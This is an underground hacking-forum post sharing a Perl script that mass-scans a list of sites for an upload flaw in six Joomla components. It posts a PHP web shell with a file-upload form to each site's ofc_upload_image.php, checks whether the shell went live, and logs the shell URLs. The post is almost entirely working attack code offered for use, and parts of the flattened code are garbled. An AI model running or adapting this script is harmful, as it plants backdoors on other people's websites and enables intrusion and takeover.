HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Perl M-A Joomla Rci Exploits Scanner

Status
Not open for further replies.
S

sQuo

~ KillmeMories ~
Shadow
User
Joined
Oct 16, 2011
Messages
5,851
Reputation
0
Reaction score
22,904
Points
688
Credits
0
‎13 Years of Service‎
24%
Code: 
>#!/usr/bin/perl# M-A_labz# This tool will scan for RCI in :# com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews# http://upload.traidnt.net/upfiles/LVc77789.png# Author : b0y h4ck3ruse HTTP::Request;use LWP::Simple;use HTTP::Request::Common;use Term::ANSIColor;use Win32::Console::ANSI;$ua = LWP::UserAgent->new;print color("bold red"),"[+] M-A Joomla Components RCI Exploits Scanner \n";print color 'reset';print color("green"),"[+] Enter File : ";print color 'reset';$file=;chomp($file);open (file, ";close file;foreach $webs (@file) {chomp $webs;$site = $webs;print color("green"), "[+] Scanning $site\n";print color 'reset';@paths=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');foreach $path(@paths){$site_vul = "http://".$site."".$path."?name=tt7.php";$data = "php code";$data.= ' Evil Upload ';$data.= ' Evil Upload ';$data.= '

'.php_uname().'
'; ";$data.= 'echo \'\'; ';$data.= 'echo \'\'; ';$data.= "if( \$_POST['_upl'] == \"Upload\" ) { ";$data.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo 'Upload Succesfully !!!

'; } ";$data.= "else { echo 'Upload Fail !!!

'; } ";$data.= " } ";$data.= "?>";$res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $data);if ($res->is_success){print color("green"), "[+] $site is vul\n";print color 'reset';@vulns=('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/tt7.php','/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/tt7.php','/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/tt7.php','/administrator/components/com_jinc/classes/graphics/tmp-upload-images/tt7.php','/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/tt7.php','/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/tt7.php');foreach $vul(@vulns){$url = "http://".$site. $vul;$request = HTTP::Request->new(GET=>$url);$useragent = LWP::UserAgent->new();$response = $useragent->request($request);if ($response->content=~m/Evil Upload/g){print color("green"), "[+] Found => $url\n\n";print color 'reset';open(BEN,">>result-$site.txt");print BEN "$url\n";close(BEN);}else{print "[-] Not Found \n";}}}}}
 
Status
Not open for further replies.
Back
Top